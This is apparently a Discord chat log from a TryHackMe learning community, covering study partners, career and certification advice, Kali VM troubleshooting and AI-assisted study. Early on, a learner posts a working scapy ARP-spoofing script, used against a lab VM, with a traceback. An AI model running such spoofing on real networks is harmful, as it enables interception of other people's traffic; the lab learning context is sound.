Hey guys. I'm new here. I'm seeking a study buddy or study groups for TryHackMe or HacktheBox(pentesting).

weary meteor
empty jasper
#

CAN SOMEBODY HELP ME IN MY ERROR
I AM USING PYTHON IN KALI LINUX VM
here is my code "#!/usr/bin/env python

import scapy.all as scapy
import time
import sys

def get_mac(ip):
arp_request = scapy.ARP(pdst=ip)
broadcast = scapy.Ether(dst="ff:ff:ff:ff:ff:ff")
arp_packet = broadcast / arp_request
answered_list = scapy.srp(arp_packet, timeout=1, verbose=False)[0]
return answered_list[0][1].hwsrc

def spoof(target_ip, spoof_ip):
target_mac = get_mac(target_ip)
packet = scapy.ARP(op=2, pdst=target_ip, hwdst=target_mac, psrc=spoof_ip)
scapy.send(packet, verbose=False)

no_packets_sent = 0

try:
while True:
spoof("192.168.126.135", "192.168.126.2")
spoof("192.168.126.2", "192.168.126.135")
no_packets_sent += 2
print("\r[+] Packet Sent: " + str(no_packets_sent)),
sys.stdout.flush()
time.sleep(2)
except KeyboardInterrupt:
print("\n[+] Detected CTRL+C... Quitting..")" and its working fine until i search anything on internet in victim vm "root@kali:~/PycharmProjects/All/Arp spoofing# python arps.py
[+] Packet Sent: 12
Traceback (most recent call last):
File "arps.py", line 23, in <module>
spoof("192.168.126.135", "192.168.126.2")
File "arps.py", line 15, in spoof
target_mac = get_mac(target_ip)
File "arps.py", line 12, in get_mac
return answered_list[0][1].hwsrc
File "/usr/local/lib/python2.7/dist-packages/scapy/plist.py", line 176, in getitem
return self.res.getitem(item)
IndexError: list index out of range
root@kali:~/PycharmProjects/All/Arp spoofing# "PLZ

radiant jacinth
upper dove
#

Looking for a learning partner pls dm mee if anyone interested

austere mist
#

Transitioning from software dev to cyber security... currently doing the Cyber Security 101 path on TryHackMe and some CTFs here and there. Any tips or suggestions?

soft pier
dry surge
#

Hlo
I am trying to subscribe on tryhackme but it is showing card declined. Can anyone help??

little shore
#

If the bank says there is no issue on their end, you can drop an email to THM Support so they can check the issue on their side.

dry surge
#

Yes I tried with different banks from my friend's banks too. But same issue

#

Actually I asked them to remove my payment details from showing directly in my account subscription section. And now this is happening

fair echo
#

Good day guy, please has anyone tried the Ec-council CCT certification, need some exam and practical tips, thanks in advance

vital zodiac
#

hey their was a glitch where you could bypass the filters with a lot of mispelling. idk if they patched it though

little shore
weary meteor
#

We can't help you with that πŸ™‚

rotund ermine
#

Good advice though, still.

odd acorn
#

It was a scam πŸ™‚

soft pier
#

james viche or however his name is spelled has some fun for sure

vagrant swallow
#

The time mentioned in the first point (11:00 PM to 3:00 AM) is in UTC (Coordinated Universal Time) ?

high coral
radiant jacinth
#

Seniors... I need your HELP I am completely new to linux and all.. In my Kali linux VM sometimes i get the message "windows application error the instruction at referenced memory at the memory could not be read click on OK to terminate the program" and the vm get terminated.. today i tired to change the background and this happened.. i tried to open settings and this happened.. can u tell me whts going on?πŸ₯²

radiant jacinth
#

i dont know about it

little shore
radiant jacinth
#

should i study SQL, PHP, HTML, CSS, JavaScript, Python, C#, C++, Java

weary meteor
radiant jacinth
weary meteor
nimble kelp
# radiant jacinth <:NotLikeThis:689847725969244171>

most of this stuff is fairly easy, like you can learn the basics of HTML, CSS and javacript in a week or two, I'm not saying be an expert but know it well enough that when you read code you can guess what it does (and be 90% correct)

strange plank
strange plank
# radiant jacinth should i study SQL, PHP, HTML, CSS, JavaScript, Python, C#, C++, Java

You won't understand anything to SQL Injection if you don't know SQL first.
You won't understand anything to identifying vulnerable code if you don't understand PHP & Java.
You won't understand how a webshell works without first understanding PHP.
You won't understand web hacking and template injection without HTML.
You won't understand XSS or DOM Hacking if you don't know JavaScript.
You won't be able to develop your own scripts and will remain a script kiddy if you don't know how to dev in Python, Java or C.

CyberSecurity and specially offensive security, is NOT entry level job or learning path. Please learn computer basics first.
People do help desk jobs before pivoting into cybersec. People are first web developers before pivoting into cybersec. People are first DB / System admins before pivoting into cyber.

The common problem I see nowadays is that people expect to hop on platforms like TryHackMe and immediately become hackers. Wrong. It takes years. Any hacker that don't know how to develop their own tools is referred to as a script kiddy - which means a person who only rely on simply copy pasting commands from pre-developed tools.

You need to learn basic dev at least. As you can see above, some people get directly into hacking without even knowing what "Computer Specifications" are, such as RAM etc. A basic gamer would know. So it's even less than the minimum for a hacker.

The picture above shows it well. Anyway, THM has everything detailed step by step, from pre-sec to cybersec 101. Check it out before considering hacking. Very little are the people who directly lands their first job ever as CyberSecurity Analysts, Pentesters etc...

https://tryhackme.com/hacktivities

broken heart
strange plank
# broken heart Which paths or courses are best to break out of script kiddy phase? I mean I fol...

THM will teach you how to pentest (When it comes to offensive security), but it won't teach you programming - which is totally normal since it's not part of the platform to teach you programming...
You just need to learn a certain language and program in it.
In a typical pentest, you'll mostly use already developped tools. However, in multiple THM rooms, you'll come across challenges where coding is needed. Adapting tool code is also needed. This is where you'll need to code on THM.

In real life, you'll also need it quite a lot.

broken heart
hoary nymphBOT
#

Gave +1 Rep to @strange plank (current: #590 - 10)

next bronze
#

If you're completely new to programming, I'd recommend spending some time learning a language like C++ or Java in-depth.

#

You'll be required to do static code analysis at a lot of points, and you'll need to know how to read and understand what the code is doing, even if you aren't proficient in the language. Languages like PHP and Rust aren't going to be as easily readable and user-friendly as Python is, which is why I recommended learning a relatively lower level language like C++ or Java first.

spark sun
strange plank
#

When you say pentest in a CTF discord server, 99% of people will automatically assume the technical side. No one thinks of the business side on CTF platforms unless it's a paid certification.

spark sun
strange plank
#

Pretty sure the technical side is most of the hard work
Reporting is just a skill that isn't very hard to learn compared to the technical expertise required to pentest

#

If reporting and limited scope of engagement is what stops someone from pentesting after all the hard work on certifications and CTFs, then IDK what to say

spark sun
#

It's not hard to learn, but it's one of those administrative things almost everyone hates to do. Most of the training I give our internal pentesters is on reporting and the admin side - they are fine technically, but communicating findings and making remediation recommendations requires a lot more of the business context

south inlet
#

My report writing and such can do with a bit of work.

strange plank
spark sun
#

I don't disagree. My point is that the admin is overlooked because it seems like every aspiring pentester thinks it's just sexy breakign things time

strange plank
#

I don't think I've seen anyone enjoying doing reports, it's a take or leave situation

spark sun
#

Yep.

spark sun
#

A couple of younger people (late teens/early 20s) wanted to be pentesters until I walked them through the entire process. They just wanted to break things and somehow had the idea that the value in a pentest was 100% in the breaking..... but it's the reporting that gives the business value.

strange plank
#

I'm the early 20s

spark sun
#

The report is the primary deliverable for the engagement, if that sucks, you've just wasted everyone's time.

#

It sounds like you are in industry alraedy, and understand the surrounding context. The young people I'm talking about were considering a career transition with zero IT background and knowledge.

strange plank
#

Yeah, my first job ever was directly in CyberSec

spark sun
#

That's pretty rare, congrats

strange plank
#

Grinded for over 12 hours per day for like a year

strange plank
hoary nymphBOT
#

Gave +1 Rep to @spark sun (current: #11 - 832)

spark sun
#

My first IT job was also in cybersec; but I came into it with a B.Sc in CompSci and 3/4 of a M.Sc in comp sci.

strange plank
#

Same situation here
Did a BSc in Comp Science
A MSc in CyberSec

#

Around 5 certs, which 2 are in pentest
I had to pull out the big game to get a job

#

Europe market is pretty bad when it comes to offsec

spark sun
#

I got hired to build a compliance tool, ended up being a principle infosec engineer doing pentest, vuln management, some sec architecture, and compliance for 14 frameworks

strange plank
#

That sounds very cool

spark sun
#

passed the CISSP within 6 months of initial hire

strange plank
#

Is the CISSP worth it?

spark sun
#

but didn't have the time served for it

#

It's the piece that connects technical to business

#

If work pays for it, get it

strange plank
#

My employer would never lol

hollow burrow
#

Guys, what certificate would u recommend me to pass as an offsec pentest enthusiast? I already have basic cybersec certificate aimed at pentest field

strange plank
#

It highly depends... what's your level?

#

If you're still a beginner, maybe train a bit on platforms first before paying for certifications

spark sun
# strange plank My employer would never lol

You should never pay a certification out of pocket, unless it's actually required for your next role. Certs are how the business demonstrates competency, they don't do much for you personally

hollow burrow
#

Mybe beginner level... just started doing easy levels ctfs

spark sun
#

You'll learn more about how to break systems by learning how to secure them

hollow burrow
#

I've got knowledge in python, js, html, css, sql and I'm considering to learn other languages

strange plank
hollow burrow
spark sun
strange plank
#

In the IAM department it's more oriented to certifications such as CyberArk ones, Okta, and microsoft's Entra certs (SC-300)

#

Basically nothing that really gets my attention

#

That's the only certs my employer is willing to pay for

spark sun
#

You're currently jr or associate role, then? Your employer should also be preparing you to move up as well. If they are pigeon-holing you into your current role and you've been there a year, start looking to make a move up in another company

strange plank
#

Jr position - I joined the company at 22 Y/O after my MSc. Ive been there for a year and 3 months

#

And since I was deep into OffSec, they offered me a part time in the OffSec department

spark sun
#

You have a M.Sc in cybersec, they should be looking to promote you very soon. If they aren't, it's my opinion that you have likely outgrown your current role already and need to think about what the next step you want to take is

strange plank
#

The next step I want to take is RTO. I'm already into maldev and evasion + already developed tools capable of evading AVs with full protection

#

Currently working on EDRs with changing callback functions to the kernel

spark sun
#

Good. Does your work have a path for you to join RTO full time?

strange plank
#

lol I wish. There is a path for pentester full time. RTO is non-existent in France, unless it's an insurance company or you work in the government.

#

I'm also dual national, so government is a bit hard without giving up my other nationality.

spark sun
#

Yeah, that's fair

strange plank
#

One more thing is that, my profile is a bit weird and rare, so not everyone is willing to take me.

#

For context, I started offsec a year and a half ago only. So 2 years ago, I didn't even know what SUID was.

#

RTO after just only 1.5 year... eh... not everyone wants that

spark sun
#

Fair

strange plank
#

Yup.

next bronze
#

Because I've been lacking in that area

#

Technical knowledge is fine for me, and I'm okay with the basics of how a penetration test works (ROE, reports, communication) but there's obviously a lot more to it, like GRC etc

spark sun
# next bronze Do you have any resources to learn more about the business side of it?

So every business a little different, and what each business wants out of a pentest is going to be slightly different. I actually think Pentest+ is a good content for the business side of a pentest. Working into a vulnerability management role is good, because you'll see how remediation works and that is valuable insight for pentest report writing and remediation recommendations.

zinc iris
#

MAN!!!! I just discoverd the live kali version, compared to virtual machinces it looks like heaven

celest flicker
#

I have a Kali setup in VmWare that works great. Also pretty trival to setup other VMs in there like the Metapoltable VM and Windows VM to practice stuffs like vulnerability scans and network traffic analysis

radiant jacinth
#

i strongly agree on your point.. and i was trying to learn the very basics of linux and thats why i installed vm.. 😁

little shore
radiant jacinth
#

4845 MB,Windows 8.1

next bronze
#

4.8 GB assigned to a VM on an 8 GB host?

#

Doesn't sound like a good idea lol

weary cargo
#

Hey guys, I have a spare laptop with intel i5 10th gen processor, I want to install kali linux in it without this VM or vitual box, How can i do it do anyone have any idea

radiant jacinth
little shore
# radiant jacinth 4845 MB,Windows 8.1

Windows 8.1 has reached EOL as of January 2023? Might want to consider switching to Windows 10? As Zagreus said, you aren't leaving much resources for your host to run your VM. 4gig should be adequate to run Kali.

little shore
hoary nymphBOT
#

Gave +1 Rep to @little shore (current: #12 - 802)

weary cargo
soft pier
fossil tendon
#

hello Who can help me find a French-speaking server about cybersecurity

brittle garden
#

It’s a little too loud in here guys

vast aspen
jovial quiver
fossil tendon
vast aspen
#

okay lol

rugged frigate
torn zenith
#

Guys, I am a novice and I need help

hidden quail
#

hey guys am facing one problem when i submit any answer in tryhackme it keeps loading and my internet is working fine if anyone is facing this same issue ? lmk

granite cloud
weary meteor
weary meteor
sage scaffold
#

ish same issue 😦

weary meteor
# sage scaffold

Yeah staff members are currently working on fixing it 😦

zinc iris
#

does the League got fixed , because I don't think it works !

cerulean ingot
weary meteor
lethal coyote
brittle garden
knotty tiger
#

Halo

bitter scroll
carmine mirage
#

Has anyone used the bootable kali usb drive on mac? I have a tails usb drive but if I do Kali now I have 2 USBs to keep track of.

quaint basin
fair vine
#

thats so cool!

rugged frigate
#

ventoy was a blessing the first time I found it.

radiant jacinth
#

Fr

bitter scroll
#

Hey everyone! πŸ‘‹
I’ve put together a repo that breaks down the foundational concepts of cybersecurity (like Governance, Cyber Kill Chain, and Core Security Principles) with real-world examples. I found it helps a lot with remembering complex ideas in a simple way.

Feel free to check it out and use it to strengthen your learning!
GitHub Repo: https://github.com/Santosh-Baliarsingh/CyberSecurity-Notes

GitHub

Contribute to Santosh-Baliarsingh/CyberSecurity-Notes development by creating an account on GitHub.

carmine mirage
hoary nymphBOT
#

Gave +1 Rep to @quaint basin (current: #10 - 871)

carmine mirage
manic hare
#

Tryhackme keeps sending emails being like β€œIs that it? Are you done learning cybersecurity?” Like bro , no, I took one day off of the website to learn from different sources. Chill 🀣

next bronze
#

It's called marketing and user retention

manic hare
#

Thanks for the confirmation

broken heart
hoary nymphBOT
#

Gave +1 Rep to @next bronze (current: #164 - 50)

broken heart
#

just a quick question. if you find a logic flaw in let's say your school's website and use it to skip lessons would you report it to the school administration after you're done with the course ? πŸ˜‚

fathom panther
quaint basin
#

Anything else ^^^ is likely to breach your local computer misuse laws

#

Actually, TBF, hunting for it in the first place likely breaches your local computer misuse laws, but responsible disclosure is a much better look.

novel geyser
#

Good morning, everyone

hasty palm
broken heart
#

I guess... hopefully won't get into trouble by reporting.

torpid comet
#

Hi

whole plank
#

Hello there

strange plank
#

Hello hello!

strange plank
humble musk
hoary nymphBOT
#

Gave +1 Rep to @bitter scroll (current: #2808 - 1)

strange plank
#

Almost 3AM for me now.

novel geyser
strange plank
#

Oh! 6 hours difference. Not so bad.

strange plank
zinc iris
#

hi everyone, if I want to learn binary exploitation , what rooms can I find in tryhackme about it ?

weary meteor
turbid wasp
#

Alright, time to get back on that horse! πŸ‡ ❀️‍πŸ”₯

quaint basin
turbid wasp
#

Alright, alright. Not bad for the 1st day back πŸ˜„

hoary nymphBOT
#

Gave +1 Rep to @weary meteor (current: #1 - 4599)

tawdry dove
# zinc iris it depends πŸ€”

It's not really a "it depends." Anything other than reporting the finding immediately is unethical. That's ignoring how it was discovered as well.

zinc iris
past spruce
quaint basin
next bronze
#

Their cert expires in 8 months

#

Nothing wrong with it

marble rampart
#

Nothing like learning how to use wpscan, then trying it on your own site and realizing you had a db password exposed to the world in a php~ file 😢

#

This is why anyone with a website really ought to learn to do pen testing

marble rampart
#

Yeah, and I cleaned it up and changed the user password

#

Just never even thought how leftover ~ files are world-visible and not processed as php

merry adder
#

Hello team! Hope everyone is doing well! Quick question… how long should I study with the SOC Simulator exclusively to be well prepared for the SAL 1 cert exam? TIA!!

weary meteor
weary meteor
#

wdym by that ?

south inlet
#

Hi. What for?

carmine rapids
#

The irony of a cybersecurity discord and people talking to a scam bot that says "lets go to the success"

south inlet
civic rootBOT
#

:hammer: demonst7#0 has been banned.

opaque yacht
#

Good day Everyone. I am currently stuck in my course of learning (WHOIS) on the Networking tools segment of my study. I was asked to carry a research on what the name of the golf course that is near the registrant address for microsoft.com is?...
And after multiple researches, I found Willows Golf Course but it doesn't seem to be correct in the answer box provided by tryhackme.

Please I need help on this so I can move on with my learning

fair vine
#

If this is tryhackme related please post your question in #room-help if its help to a study like university, school etc i dont think we can help

soft island
soft island
soft island
south inlet
#

Not appropriate though.

covert sundial
#

does anyone have the answer to wireshark 101 task 11 for packet 18 url?

supple surge
#

do you guys listen to anything while you are on thm? trying to find what I listen to, I've tried thoose YT radios, but I don't think I like them enough xD

strange plank
# supple surge do you guys listen to anything while you are on thm? trying to find what I liste...

🎼 | Listen on Spotify, Apple music and more
β†’ https://fanlink.tv/ChillSynthwave

🎢 | Subscribe to this channel for more synthwave music
β†’ https://bit.ly/synthwave-channel

🌎 | Lofi Girl on all social media
β†’ https://link.lofigirl.com/m/Community

🌐| Our Websites
β†’ https://link.lofigirl.com/m/website

πŸ‘• | Lofi Girl merc...

β–Ά Play video
surreal quiver
granite crest
#

I listen to Vivaldi's l'inverno and Poets of the Fall for the easier ones and for the ones that I'm not timed on (home, non-thm projects) and just silence for the hard ones

#

And classical in general

supple surge
white forge
#

also gives me something to look at for second if i get bored at staring learning material

fair vine
# supple surge do you guys listen to anything while you are on thm? trying to find what I liste...

im not big on lofi but i like this one
https://www.youtube.com/watch?v=IxPANmjPaek

The medieval radio makes its return! Embark on a captivating journey through the medieval ages and immerse yourself in the timeless charm of the past.

🏰 | Discover our medieval lofi playlist on Spotify, Apple Music and more
β†’ https://link.lofigirl.com/m/music

🌎 | Follow Lofi Girl on all social platforms
β†’ https://link.lofigirl.com/m...

β–Ά Play video
fair flint
fair vine
#

Stuff with vocals make it more difficult for me

gritty pebble
#

shshh be quiet!!! it's quiet convo room!!!

dusty apex
#

hello

#

well it has been 4 month learning offensive security πŸ™‚

#

I started coding at 14 and completed my frontend web development journey. Then, I thought, 'Okay, I can build websites, but how do hackers hack them?' That's when I switched from Windows 10 to Kali Linux and started learning offensive security in January. I'm self-taught and learning at my own pace. I'm currently in my first year of college, but I can't attend classes. I've completed 93 rooms so far, and my mind is set on completing the Sentry 100 XD.

hollow dove
fringe drum
dusty apex
#

but i dont know how can i play roblox in kali linux

#

i really miss this game

hollow dove
frozen shore
radiant jacinth
#

Believe me,it sucks to have linux as the main os

#

What did you play back then?

fair vine
#

For gaming sure but in general it does not

radiant jacinth
#

Man

#

Blox fruits its so tryhard rn

dusty apex
#

but roblox doesnt support linux why?

dusty apex
fair vine
#

But there are some ways to get it running according to the web

hollow dove
#

Is running MacBook Pro w/ M1 Max good for programming and for running VM & DockerCont?

halcyon schooner
dusty apex
#

can i send u a song written by chatgpt for u

fair vine
#

I mean you can send it here

dusty apex
#

🎀 Title: "Bot Got Caught"

(Beat drops: Fast-paced, mocking vibe)

(Verse 1)
Yo Bot, you a nerd in disguise,
Spittin' Wikipedia facts with them dead-ass replies,
"Due to Hyperion" β€” bro, no surprise,
You built like a FAQ page, zero real vibes.

You flexin' "web says" like you cracked a code,
But you Googled that sh*t, didn't even reload,
Talkin' β€˜bout Wine, talkin’ β€˜bout blocks,
Meanwhile your bars fall flatter than Crocs.

(Hook)
Yo Bot, you robotic, no soul, no flex,
Sound like you copy-paste straight from the text,
Next time think before you speak that mess,
'Cause ByteBandit’s here, and you lookin' depressed.

(Verse 2)
ByteBandit asked, you dropped a dry sneeze,
Actin' like a genius but you just a tease,
"Some ways to run it" β€” vague like a breeze,
Man, even Clippy had better expertise.

You ain't teachin', you leechin',
Bot, stop preachin',
Go update your system,
Your brain still glitchin’.

(Bridge)
"According to the web" β€” bro that's all you know,
You ain't a guide, just a low-tier echo,
Stay in your lane, take that L real slow,
ByteBandit’s here, finna steal your show.

(Hook)
Yo Bot, you robotic, no soul, no flex,
Sound like you copy-paste straight from the text,
Next time think before you speak that mess,
'Cause ByteBandit’s here, and you lookin' depressed.

(Outro)
Ayo Bot,
Upgrade your firmware,
Before you try steppin' into the ring again.
You got byte-sized brain,
And you just got byte-sized destroyed.
Mic slam.

@fair vine

mortal plank
#

is there any other port opened for the VPN than 1194 ? as it's blocked and unreachable from my ISP

sly musk
mortal plank
hoary nymphBOT
#

Gave +1 Rep to @sly musk (current: #2838 - 1)

spice wraith
#

Why is this called β€œquiet” conversation meanwhile everyone talking

granite crest
#

I think it might be sarcasm

sly musk
#

hi guys. do you know if there are still irc channels active in cybersecurity today like this channel in discord? i'd like to have a look at irc but the channels i've tried to join seems quite silent...

strange plank
spice wraith
sly musk
#

what do you think? Still worth something using an irc clients like irssi today to chat about specific arguments or apllications like discords have taken their place?

odd acorn
#

-unmute 1362875215255965848

hoary nymphBOT
#

πŸ”Š Unmuted merediane

dusty apex
#

well what is C2 attack

#

i thinks its used for as creating backdoor right ?

#

well web pentesting used to find vuln on web and exploit it , but what about cryptography ?

#

as soon i'll complete all labs on portswigger then i'll move to cryptography

crystal isle
tribal sorrel
rose wyvern
#

someone can help me with this both answe is from Nmap Post Port Scans: 1) Launch the AttackBox if you haven't already. After you ensure you have terminated the VM from Task 2, start the target machine for this task. On the AttackBox, run Nmap with the default scripts -sC against MACHINE_IP. You will notice that there is a service listening on port 53. What is its full version value? 2) Based on its description, the script ssh2-enum-algos β€œreports the number of algorithms (for encryption, compression, etc.) that the target SSH2 server offers.” What is the name of the server host key algorithm that relies on SHA2-512 and is supported by MACHINE_IP?

rose wyvern
#

thx my bro

south inlet
#

Please don't.

winter wraith
#

Hii

dusty apex
#

Well, there's one question: if the university teaches CEH and OSCP in cybersecurity offensive, or not? If not, then why are we attending university, we can just go for the certificate straight away?

south inlet
frozen shore
#

i've decided to go through my old rooms and make new notes of them in a notebook because my old ones with A4 papers got damaged, and they were pretty messy in general

#

governance and regulations is killing me though lol

fair vine
#

I have to do the same thing and I'm not looking forward to it

granite crest
weary meteor
hoary nymphBOT
#

Gave +1 Rep to @granite crest (current: #1134 - 4)

mossy axle
deep lantern
#

I'm not sure if I can post this curious question on to this channel -- but to have assistance w/ChatGpt for instance, is that permissible or is that like trying to cheat on your SATs ( an exaggeration winkwink)

fair vine
#

I’m trying to decide between ext4 and Btrfs for my setup. I know Btrfs offers features like snapshots, but I’m wondering how it compares to ext4 in terms of stability and data corruption risks. Since I can’t use RAID, would Btrfs be just as reliable as ext4, or is it more prone to corruption? Also, would regular snapshots and backups be enough to protect my data in Btrfs, or are there other things I should consider? Im installing arch BTW

fair vine
#

yep, if it writes code for you. You still have to know what it does and how to implement it

deep lantern
#

Welp, being that AI and cyber security go hand and hand, I just thought that on a challenge that I was struggling with, the AI bot provided a run down in how to come up with the outcome of the challenge. You also need to word the prompts precisely when asking AI, especially in this field.

soft finch
#

I get the AI thing. I use it constantly. But you really do need to prompt it carefully. Here's a brief example of a prompt I might use (I have a thing for RPGs):

Act as a cybersecurity tutor. Do not give me direct answers to challenges. Instead, help me understand the concept by guiding me with questions, examples, or analogies (bonus if they're RPG-themed). Your role is to strengthen my thinking, not solve problems for me. Prioritize real-world application, hands-on learning, and clear breakdowns. When I struggle, rephrase or simplify the explanation, but always nudge me toward figuring it out myself.

deep lantern
#

@radiant jacinth agree

#

@soft finch If that isn't an awesome prompt to AI I don't know what is!

soft finch
hoary nymphBOT
#

Gave +1 Rep to @deep lantern (current: #2850 - 1)

deep lantern
#

Yeah, there's even some interesting tutorials on-line in just how to prompt an AI bot to get the right outcome.

soft finch
#

Yeah there is. I found a whole series of short courses over on Coursera done by a professor at Vanderbilt. Totally changed the way I use AI. Made it 100x more effective

deep lantern
#

There's a YouTube series sponsored by IBM in which the instructor is a highly recognized SOc dude with amazing credentials. And in it, he has a course I believe in AI.

soft finch
#

I'll have to look for it.
AI is here to stay. And it's best we learn how to use it properly. Under use it, and you're behind. Over use it, and you really don't learn anything.

hoary nymphBOT
#

Gave +1 Rep to @soft finch (current: #2850 - 1)

soft finch
soft finch
# jovial quiver Amazing, thanks

That's a really basic prompt. You may want to add more context to it based on what exactly you're looking for, but it's a great start.
Uploading articles, PDFs, web page links, anything to feed it more detail will help dial it in to what you need.
You can even tell it to ask you questions to better understand what you need from it.
Good luck!

deep lantern
#

@soft finch agree with you - need to rely on our own process to get through a problem.

vagrant dove
#

whisper So this is quiet-converstion

vagrant dove
#

Wow, it's soooooooo quiet

west zephyr
#

I’m striving to become one of the best Red Teamers out there.
Right now, I don’t have a strong team around meβ€”but I’m looking to change that. I’m searching for a team of skilled individuals who are not just great at what they do, but who are also willing to teach and guide me to level up. I bring dedication, a relentless work ethic, and a hunger to learn.
All I need is a chance.

fair vine
#

the mods dont like it when you spam your question across channels @west zephyr

west zephyr
#

Thank you for the reminderβ€”I understand and apologize for the multiple msg. I’ve been really eager to learn and find the right team, but since I didn’t get any responses to my original message, I thought sharing it in other channels might help. I’ll make sure to follow the rules and keep it to one channel moving forward. I truly appreciate your guidance.

junior ermine
shut sigil
#

noises

civic oak
#

hello everyone I have just bought TP link TL-WN722N version 4 wifi adapter and its not working with kali even I install the drivers to Kali does anybody have any solution to this ?

stark bane
#

Hi All,

I want to buy a raspberry pi
And want to run web server mostly one's to test bug bounty n cyber security

Ad block server, If possible some tools for recons, and a vpn server too

Confused if i should get 4 gb or 8gb

And if raspberry pi 4 or 5

5 seems out of budget, but the new ssd port direct attach option, real time battery module option sounds tempting.

So feel free to help me out, andπŸ™ long post ..

civic oak
#

yup

stark bane
#

Maybe try with generic wifi modules installed

civic oak
#

Right now I just got a success but it only showed me the access points for some seconds then stopped

stark bane
#

Nice user name

civic oak
#

thx !

stark bane
#

What it means

civic oak
#

nothing

stark bane
#

Btw ur kali installed on disk
Or usb boot?

stark bane
civic oak
#

vbox

#

I couldnt try it installed somehow my usb didnt work with rufus it just stops

stark bane
#

If its vbox u gotta see usb bridging
Or maybe virtual usb port settings
Might be thats making issue....

Wait so ur system using wifi net
And kali vbox is not having net am i right?

civic oak
#

I am using bridge net connection and I have put the usb port settings once to usb 1.0 and usb 2.0

#

with usb 1.0 it worked for seconds

#

I am trying to reproduce it to see if its maybe because of this issue

stark bane
#

U want to control tp link from vbox

Or just want to use it as an internet source in vbox

civic oak
#

for wifi penetration testing

stark bane
#

Vbox is must for you?

civic oak
#

no

stark bane
#

Kali vbox is must for you?

civic oak
#

ill be trying it on bare metal

#

I think the issue is due to usb ports

stark bane
#

Works for me

civic oak
#

the wifi adapter having 1.0 usb and whenever I am setting the sub port settings to 1.0 from vbox it gives me access but still for a short period of time

stark bane
#

I dont have much idea of these advance port specific settings of vbox n all..

#

I guess u have vmware guest packages installed or i forgot the name

Maybe add on pkg type

civic oak
#

thx!

stark bane
#

Welcome

civic oak
#

just figured out and fully working with TP link TL-WN722N version 4 wifi adapter !

south inlet
frail vaultBOT